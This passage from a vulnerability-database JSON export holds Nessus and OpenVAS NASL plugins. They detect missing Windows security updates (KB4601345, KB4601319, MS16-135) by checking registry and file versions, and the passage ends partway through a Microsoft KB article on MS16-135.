"CVE-2021-24094", "CVE-2021-24091", "CVE-2021-24078", "CVE-2021-24088"], "modified": "2021-02-09T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_FEB_4601345.NASL", "href": "https://www.tenable.com/plugins/nessus/146337", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(146337);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/03/19\");\n\n script_cve_id(\n \"CVE-2021-1698\",\n \"CVE-2021-1722\",\n \"CVE-2021-1727\",\n \"CVE-2021-1731\",\n \"CVE-2021-1732\",\n \"CVE-2021-1734\",\n \"CVE-2021-24074\",\n \"CVE-2021-24076\",\n \"CVE-2021-24077\",\n \"CVE-2021-24078\",\n \"CVE-2021-24079\",\n \"CVE-2021-24080\",\n \"CVE-2021-24081\",\n \"CVE-2021-24082\",\n \"CVE-2021-24083\",\n \"CVE-2021-24084\",\n \"CVE-2021-24086\",\n \"CVE-2021-24088\",\n \"CVE-2021-24091\",\n \"CVE-2021-24093\",\n \"CVE-2021-24094\",\n \"CVE-2021-24096\",\n \"CVE-2021-24098\",\n \"CVE-2021-24102\",\n \"CVE-2021-24103\",\n \"CVE-2021-24106\",\n \"CVE-2021-25195\"\n );\n script_xref(name:\"MSKB\", value:\"4601345\");\n script_xref(name:\"MSFT\", value:\"MS21-4601345\");\n script_xref(name:\"IAVA\", value:\"2021-A-0072\");\n script_xref(name:\"IAVA\", value:\"2021-A-0093\");\n\n script_name(english:\"KB4601345: Windows 10 Version 1809 and Windows Server 2019 February 2021 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4601345.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-1734, CVE-2021-24076,\n CVE-2021-24079, CVE-2021-24084, CVE-2021-24106)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-24080,\n CVE-2021-24086, CVE-2021-24098)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-1722,\n CVE-2021-24074, CVE-2021-24077, CVE-2021-24078,\n CVE-2021-24081, CVE-2021-24083, CVE-2021-24088,\n CVE-2021-24091, CVE-2021-24093, CVE-2021-24094)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-1698, CVE-2021-1727, CVE-2021-1732,\n CVE-2021-24096, CVE-2021-24102, CVE-2021-24103,\n CVE-2021-25195)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application. (CVE-2021-1731,\n CVE-2021-24082)\");\n # https://support.microsoft.com/en-us/office/february-9-2021%e2%80%94kb4601345-os-build-17763-1757-c38b7b85-0d84-d979-1a29-e4ba97b82042?ui=en-US&rs=en-US&ad=US\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a0231130\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4601345.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-24094\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Win32k ConsoleControl Offset Confusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/02/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/02/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/02/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_func.inc');\ninclude('misc_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-02';\nkbs = make_list('4601345');\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'17763',\n rollup_date:'02_2021',\n bulletin:bulletin,\n rollup_kb_list:[4601345])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-20T22:27:45", "description": "The remote Windows host is missing security update 4601319.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-1734, CVE-2021-24076,\n CVE-2021-24079, CVE-2021-24084, CVE-2021-24106)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-24075,\n CVE-2021-24080, CVE-2021-24086, CVE-2021-24098)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-1722,\n CVE-2021-24074, CVE-2021-24077, CVE-2021-24081,\n CVE-2021-24083, CVE-2021-24088, CVE-2021-24091,\n CVE-2021-24093, CVE-2021-24094)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-1698, CVE-2021-1727, CVE-2021-1732,\n CVE-2021-24096, CVE-2021-24102, CVE-2021-24103,\n CVE-2021-25195)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application. (CVE-2021-1731,\n CVE-2021-24082)", "edition": 6, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-02-09T00:00:00", "title": "KB4601319: Windows 10 version 2004 Feb 2021 Security Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2021-24082", "CVE-2021-24083", "CVE-2021-24103", "CVE-2021-1722", "CVE-2021-24086", "CVE-2021-24079", "CVE-2021-24076", "CVE-2021-24084", "CVE-2021-24102", "CVE-2021-24098", "CVE-2021-24106", "CVE-2021-1734", "CVE-2021-24077", "CVE-2021-1727", "CVE-2021-24075", "CVE-2021-1732", "CVE-2021-1731", "CVE-2021-24080", "CVE-2021-24093", "CVE-2021-24074", "CVE-2021-24096", "CVE-2021-1698", "CVE-2021-25195", "CVE-2021-24081", "CVE-2021-24094", "CVE-2021-24091", "CVE-2021-24078", "CVE-2021-24088"], "modified": "2021-02-09T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_FEB_4601319.NASL", "href": "https://www.tenable.com/plugins/nessus/146345", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(146345);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/03/19\");\n\n script_cve_id(\n \"CVE-2021-1698\",\n \"CVE-2021-1722\",\n \"CVE-2021-1727\",\n \"CVE-2021-1731\",\n \"CVE-2021-1732\",\n \"CVE-2021-1734\",\n \"CVE-2021-24074\",\n \"CVE-2021-24075\",\n \"CVE-2021-24076\",\n \"CVE-2021-24077\",\n \"CVE-2021-24078\",\n \"CVE-2021-24079\",\n \"CVE-2021-24080\",\n \"CVE-2021-24081\",\n \"CVE-2021-24082\",\n \"CVE-2021-24083\",\n \"CVE-2021-24084\",\n \"CVE-2021-24086\",\n \"CVE-2021-24088\",\n \"CVE-2021-24091\",\n \"CVE-2021-24093\",\n \"CVE-2021-24094\",\n \"CVE-2021-24096\",\n \"CVE-2021-24098\",\n \"CVE-2021-24102\",\n \"CVE-2021-24103\",\n \"CVE-2021-24106\",\n \"CVE-2021-25195\"\n );\n script_xref(name:\"MSKB\", value:\"4601319\");\n script_xref(name:\"MSFT\", value:\"MS21-4601319\");\n script_xref(name:\"IAVA\", value:\"2021-A-0072\");\n script_xref(name:\"IAVA\", value:\"2021-A-0093\");\n\n script_name(english:\"KB4601319: Windows 10 version 2004 Feb 2021 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4601319.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-1734, CVE-2021-24076,\n CVE-2021-24079, CVE-2021-24084, CVE-2021-24106)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-24075,\n CVE-2021-24080, CVE-2021-24086, CVE-2021-24098)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-1722,\n CVE-2021-24074, CVE-2021-24077, CVE-2021-24081,\n CVE-2021-24083, CVE-2021-24088, CVE-2021-24091,\n CVE-2021-24093, CVE-2021-24094)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-1698, CVE-2021-1727, CVE-2021-1732,\n CVE-2021-24096, CVE-2021-24102, CVE-2021-24103,\n CVE-2021-25195)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application. (CVE-2021-1731,\n CVE-2021-24082)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4601319\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released KB4601319 to address this issue.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-24094\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Win32k ConsoleControl Offset Confusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/02/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/02/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/02/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-02';\nkbs = make_list(\n '4601319'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'19041',\n rollup_date:'02_2021',\n bulletin:bulletin,\n rollup_kb_list:[4601319])\n|| \nsmb_check_rollup(os:'10',\n sp:0,\n os_build:'19042',\n rollup_date:'02_2021',\n bulletin:bulletin,\n rollup_kb_list:[4601319])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "openvas": [{"lastseen": "2020-06-10T19:47:59", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-7246", "CVE-2016-7218", "CVE-2016-7214", "CVE-2016-7255", "CVE-2016-7215"], "description": "This host is missing a important security\n update according to Microsoft Bulletin MS16-135", "modified": "2020-06-08T00:00:00", "published": "2016-11-09T00:00:00", "id": "OPENVAS:1361412562310809092", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310809092", "type": "openvas", "title": "Microsoft Windows Kernel-Mode Drivers Multiple Vulnerabilities (3199135)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Kernel-Mode Drivers Multiple Vulnerabilities (3199135)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.809092\");\n script_version(\"2020-06-08T14:40:48+0000\");\n script_cve_id(\"CVE-2016-7214\", \"CVE-2016-7215\", \"CVE-2016-7218\", \"CVE-2016-7246\",\n \"CVE-2016-7255\");\n script_bugtraq_id(92835);\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-08 14:40:48 +0000 (Mon, 08 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-11-09 10:09:34 +0530 (Wed, 09 Nov 2016)\");\n script_name(\"Microsoft Windows Kernel-Mode Drivers Multiple Vulnerabilities (3199135)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a important security\n update according to Microsoft Bulletin MS16-135\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The multiple flaws are due to,\n\n - A kernel Address Space Layout Randomization (ASLR) bypass error.\n\n - The windows kernel-mode driver fails to properly handle objects in memory.\n\n - The windows bowser.sys kernel-mode driver fails to properly handle objects\n in memory.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an\n attacker to retrieve the memory address of a kernel object, run arbitrary code\n in kernel mode and to log on to an affected system and runs a specially crafted\n application that could exploit the vulnerabilities and take control of an\n affected system.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 10 x32/x64\n\n - Microsoft Windows 8.1 x32/x64\n\n - Microsoft Windows Server 2012/2012R2\n\n - Microsoft Windows 10 Version 1511 x32/x64\n\n - Microsoft Windows 10 Version 1607 x32/x64\n\n - Microsoft Windows 7 x32/x64 Service Pack 1 and prior\n\n - Microsoft Windows Vista x32/x64 Service Pack 2 and prior\n\n - Microsoft Windows Server 2008 x32/x64 Service Pack 2 and prior\n\n - Microsoft Windows Server 2008 R2 x64 Service Pack 1 and prior\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/kb/3199135\");\n script_xref(name:\"URL\", value:\"https://technet.microsoft.com/en-us/library/security/ms16-135\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(winVista:3, win7:2, win7x64:2, win2008:3, win2008r2:2, winVistax64:3, win2008x64:3,\n win2012:1, win2012R2:1, win8_1:1, win8_1x64:1, win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_systemroot();\nif(!sysPath){\n exit(0);\n}\n\nwinVer = fetch_file_version(sysPath:sysPath, file_name:\"system32\\Win32k.sys\");\nbrVer = fetch_file_version(sysPath:sysPath, file_name:\"system32\\drivers\\Bowser.sys\");\nif(!winVer && !brVer){\n exit(0);\n}\n\nif(hotfix_check_sp(winVista:3, winVistax64:3, win2008:3, win2008x64:3) > 0)\n{\n if(version_is_less(version:winVer, test_version:\"6.0.6002.19706\"))\n {\n Vulnerable_range1 = \"Less than 6.0.6002.19706\";\n VULN1 = TRUE ;\n }\n else if(version_in_range(version:winVer, test_version:\"6.0.6002.23000\", test_version2:\"6.0.6002.24028\"))\n {\n Vulnerable_range1 = \"6.0.6002.23000 - 6.0.6002.24028\";\n VULN1 = TRUE ;\n }\n else if(version_is_less(version:brVer, test_version:\"6.0.6002.19698\"))\n {\n Vulnerable_range2 = \"Less than 6.0.6002.19698\";\n VULN2 = TRUE ;\n }\n else if(version_in_range(version:brVer, test_version:\"6.0.6002.23000\", test_version2:\"6.0.6002.24020\"))\n {\n Vulnerable_range2 = \"6.0.6002.23000 - 6.0.6002.24020\";\n VULN2 = TRUE ;\n }\n}\n\nelse if(hotfix_check_sp(win7:2, win7x64:2, win2008r2:2) > 0 && brVer)\n{\n if(version_is_less(version:brVer, test_version:\"6.1.7601.23567\"))\n {\n Vulnerable_range2 = \"Less than 6.1.7601.23567\";\n VULN2 = TRUE ;\n }\n}\n\nelse if(hotfix_check_sp(win2012:1) > 0 && brVer)\n{\n if(version_is_less(version:brVer, test_version:\"6.2.9200.22004\"))\n {\n Vulnerable_range2 = \"Less than 6.2.9200.22004\";\n VULN2 = TRUE ;\n }\n}\n\nelse if(hotfix_check_sp(win8_1:1, win8_1x64:1, win2012R2:1) > 0 && winVer)\n{\n if(version_is_less(version:winVer, test_version:\"6.3.9600.18524\"))\n {\n Vulnerable_range1 = \"Less than 6.3.9600.18524\";\n VULN1 = TRUE ;\n }\n}\n\nelse if(hotfix_check_sp(win10:1, win10x64:1) > 0 && winVer)\n{\n if(version_is_less(version:winVer, test_version:\"10.0.10240.16384\"))\n {\n Vulnerable_range1 = \"Less than 10.0.10240.16384\";\n VULN1 = TRUE ;\n }\n else if(version_in_range(version:winVer, test_version:\"10.0.10586.0\", test_version2:\"10.0.10586.19\"))\n {\n Vulnerable_range1 = \"10.0.10586.0 - 10.0.10586.19\";\n VULN1 = TRUE ;\n }\n else if(version_in_range(version:winVer, test_version:\"10.0.14393.0\", test_version2:\"10.0.14393.446\"))\n {\n Vulnerable_range1 = \"10.0.14393.0 - 10.0.14393.446\";\n VULN1 = TRUE ;\n }\n}\n\nif(VULN1)\n{\n report = 'File checked: ' + sysPath + \"\\system32\\Win32k.sys\"+ '\\n' +\n 'File version: ' + winVer + '\\n' +\n 'Vulnerable range: ' + Vulnerable_range1 + '\\n' ;\n security_message(data:report);\n exit(0);\n}\n\nelse if(VULN2)\n{\n report = 'File checked: ' + sysPath + \"\\system32\\drivers\\Bowser.sys\"+ '\\n' +\n 'File version: ' + brVer + '\\n' +\n 'Vulnerable range: ' + Vulnerable_range2 + '\\n' ;\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "mskb": [{"lastseen": "2021-01-01T22:49:58", "bulletinFamily": "microsoft", "cvelist": ["CVE-2016-7246", "CVE-2016-7218", "CVE-2016-7214", "CVE-2016-7255", "CVE-2016-7215"], "description": "<html><body><p>Resolves a vulnerability in Windows that could allow elevation of privilege if an attacker logs on to an affected system and runs a specially crafted application that could exploit the vulnerabilities and take control of the system.</p><h2>Summary</h2><div class=\"kb-summary-section section\">This security update resolves vulnerabilities in Microsoft Windows. The most severe of the vulnerabilities could allow elevation of privilege if an attacker logs on to an affected system and runs a specially crafted application that could exploit the vulnerabilities and take control of the affected system. <br/><br/>To learn more about the vulnerability, see <a href=\"https://technet.microsoft.com/library/security/ms16-135\" id=\"kb-link-2\" target=\"_self\">Microsoft Security Bulletin MS16-135</a>. </div><h2>More Information</h2><div class=\"kb-moreinformation-section section\"><span class=\"text-base\">Important </span><br/><br/><ul class=\"sbody-free_list\"><li>All future security and non-security updates for Windows RT 8.1, Windows 8.1, and Windows Server 2012 R2 require update <a href=\"https://support.microsoft.com/en-us/help/2919355\" id=\"kb-link-3\" target=\"_self\">2919355</a> to be installed. We recommend that you install update <a href=\"https://support.microsoft.com/en-us/help/2919355\" id=\"kb-link-4\" target=\"_self\">2919355</a> on your Windows RT 8.1-based, Windows 8.1-based, or Windows Server 2012 R2-based computer so that you receive future updates. </li><li>If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see <a href=\"https://technet.microsoft.com/en-us/library/hh825699\" id=\"kb-link-5\" target=\"_self\">Add language packs to Windows</a>.</li></ul></div><h2>Additional information about this security update</h2><div class=\"kb-moreinformation-section section\"><br/>The following articles contain additional information about this security update as it relates to individual product versions. The articles may contain known issue information.<br/><br/><ul class=\"sbody-free_list\"><li><a href=\"https://support.microsoft.com/help/3199135\" id=\"kb-link-6\" target=\"_self\">3199135</a> MS16-135: Security update for Windows kernel-mode drivers: November 8, 2016</li><li><a href=\"https://support.microsoft.com/help/3198234\" id=\"kb-link-7\" target=\"_self\">3198234</a> MS16-135: Description of the security update for Windows kernel-mode drivers: November 8, 2016</li><li><a href=\"https://support.microsoft.com/help/3194371\" id=\"kb-link-8\" target=\"_self\">3194371</a> MS16-135: Description of the security update for Windows kernel-mode drivers: November 8, 2016</li><li><a href=\"https://support.microsoft.com/help/3198218\" id=\"kb-link-9\" target=\"_self\">3198218</a> MS16-131 and MS16-135: Description of the security update for Windows: November 8, 2016</li><li><a href=\"https://support.microsoft.com/help/3197873\" id=\"kb-link-10\" target=\"_self\">3197873</a> November 2016 Security Only Quality Update for Windows RT 8.1, Windows 8.1, and Windows Server 2012 R2</li><li><a href=\"https://support.microsoft.com/help/3197874\" id=\"kb-link-11\" target=\"_self\">3197874</a> November 2016 Security Monthly Quality Rollup for Windows 8.1, and Windows Server 2012 R2</li><li><a href=\"https://support.microsoft.com/help/3197876\" id=\"kb-link-12\" target=\"_self\">3197876</a> November 2016 security only quality update for Windows Server 2012</li><li><a href=\"https://support.microsoft.com/help/3197877\" id=\"kb-link-13\" target=\"_self\">3197877</a> November 2016 Security Monthly Quality Rollup for Windows Server 2012</li><li><a href=\"https://support.microsoft.com/help/3197867\" id=\"kb-link-14\" target=\"_self\">3197867</a> November 2016 security only quality update for Windows 7 SP1 and Windows Server 2008 R2 SP1</li><li><a href=\"https://support.microsoft.com/help/3197868\" id=\"kb-link-15\" target=\"_self\">3197868</a> November 2016 Security Monthly Quality Rollup for Windows 7 SP1 and Windows Server 2008 R2 SP1</li><li><a href=\"https://support.microsoft.com/help/3198585\" id=\"kb-link-16\" target=\"_self\">3198585</a> Cumulative Update for Windows 10: November 8, 2016</li><li><a href=\"https://support.microsoft.com/help/3200970\" id=\"kb-link-17\" target=\"_self\">3200970</a> Cumulative Update for Windows 10 Version 1607 and Windows Server 2016: November 8, 2016</li><li><a href=\"https://support.microsoft.com/help/3198586\" id=\"kb-link-18\" target=\"_self\">3198586</a> Cumulative Update for Windows 10 Version 1511: November 8, 2016</li></ul></div><h2>More Information</h2><div class=\"kb-moreinformation-section section\"><div class=\"faq-section\" faq-section=\"\"><div class=\"faq-panel\"><div class=\"faq-panel-heading\" faq-panel-heading=\"\"><span class=\"link-expand-image\"><span class=\"faq-chevron win-icon win-icon-ChevronUpSmall\"></span></span><span class=\"bold btn-link link-expand-text\"><span class=\"bold btn-link\">Security update deployment information</span></span></div><div class=\"faq-panel-body\" faq-panel-body=\"\"><span><div class=\"kb-collapsible kb-collapsible-collapsed\"><br/><br/><h4 class=\"sbody-h4\">Windows Vista (all editions)</h4><span class=\"text-base\">Reference Table</span><br/><br/>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file names</span></td><td class=\"sbody-td\">For all supported 32-bit editions of Windows Vista:<br/><span class=\"text-base\">http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB3198234</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported x64-based editions of Windows Vista:<br/><span class=\"text-base\">http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB3198234</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/934307\" id=\"kb-link-20\" target=\"_self\">Microsoft Knowledge Base Article 934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">You must restart the system after you apply this security update.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">WUSA.exe does not support uninstalling updates. To uninstall an update that is installed by WUSA, click <strong class=\"uiterm\">Control Panel</strong>, and then click <span class=\"text-base\">Security</span>. Under <span class=\"sbody-userinput\">Windows Update</span>, click <strong class=\"uiterm\">View installed updates</strong>, and then select from the list of updates.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3198234\" id=\"kb-link-21\" target=\"_self\">Microsoft Knowledge Base Article 3198234</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\"><span class=\"text-base\">Note</span> This update does not add a registry key to validate its installation.</td></tr></table></div><br/><br/><h4 class=\"sbody-h4\">Windows Server 2008 (all editions)</h4><span class=\"text-base\">Reference Table</span><br/><br/>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td 